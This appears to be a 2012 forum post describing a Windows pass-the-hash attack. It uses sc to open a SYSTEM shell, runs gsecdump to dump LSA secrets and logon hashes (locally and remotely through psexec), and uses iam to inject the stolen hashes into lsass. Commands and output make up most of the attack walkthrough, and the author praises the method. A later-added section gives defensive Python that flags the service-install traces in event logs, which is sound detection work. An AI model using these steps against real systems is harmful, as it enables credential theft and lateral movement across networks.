Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process, which is the hash injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, or those obtained with gethash, actually don't need to be cracked at all; this is just a matter of using the tools. As the original article puts it, whether the password is 4 characters or 127, once you have the hash, you're 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I looked at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
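As an added example for defenders (not part of the original post or the Truesec article), the following Python triages flattened Windows System-log events for the traces this procedure leaves: a service installation (Event ID 7045) whose ImagePath is a command interpreter, the immediate start failure that follows (Event ID 7000, the 1053 error shown above), and the PSEXESVC helper service that PsExec installs on the target. The key="value" line format, the sample events and the interpreter list are constructed assumptions, not a real forwarder's output.

```python
import re

# Constructed sample records (not real captures) in the shape a log forwarder
# might use when flattening Windows System-log events into key="value" pairs.
SAMPLE_EVENTS = [
    'EventID=7045 ServiceName="shellcmdline" ImagePath="C:\\WINDOWS\\system32\\cmd.exe /K start" AccountName="LocalSystem"',
    'EventID=7000 ServiceName="shellcmdline" Error="The service did not respond to the start or control request in a timely fashion."',
    'EventID=7045 ServiceName="PSEXESVC" ImagePath="%SystemRoot%\\PSEXESVC.exe" AccountName="LocalSystem"',
    'EventID=7045 ServiceName="Spooler" ImagePath="%SystemRoot%\\System32\\spoolsv.exe" AccountName="LocalSystem"',
    'EventID=7036 ServiceName="Spooler" State="running"',
]

# Command interpreters are never a legitimate service executable on their own (assumed list).
INTERPRETERS = {"cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe"}
# Service name that PsExec installs on the target to run its remote command.
REMOTE_EXEC_SERVICES = {"psexesvc"}

KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

def parse_event(line):
    """Turn one flattened event line into a dict; quoted values keep their spaces."""
    fields = {}
    for m in KV_RE.finditer(line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(2)
    return fields

def image_basename(image_path):
    """Lower-case file name of the executable in an ImagePath, arguments dropped."""
    path = image_path.strip()
    exe = path[1:].split('"', 1)[0] if path.startswith('"') else path.split(" ", 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(lines):
    """Return (service_name, reason) alerts for the service-abuse traces described above."""
    installed = set()   # services seen being installed within this log window
    alerts = []
    for line in lines:
        ev = parse_event(line)
        eid, name = ev.get("EventID"), ev.get("ServiceName", "")
        if eid == "7045":
            installed.add(name.lower())
            if image_basename(ev.get("ImagePath", "")) in INTERPRETERS:
                alerts.append((name, "interpreter registered as service binary: " + ev["ImagePath"]))
            if name.lower() in REMOTE_EXEC_SERVICES:
                alerts.append((name, "remote-execution helper service installed"))
        elif eid == "7000" and name.lower() in installed:
            # A just-installed service that immediately fails to start (the 1053 on
            # the page) is the usual trace of a non-service binary launched by the SCM.
            alerts.append((name, "newly installed service failed to start: " + ev.get("Error", "")))
    return alerts

if __name__ == "__main__":
    for svc, why in triage(SAMPLE_EVENTS):
        print(f"ALERT {svc}: {why}")
```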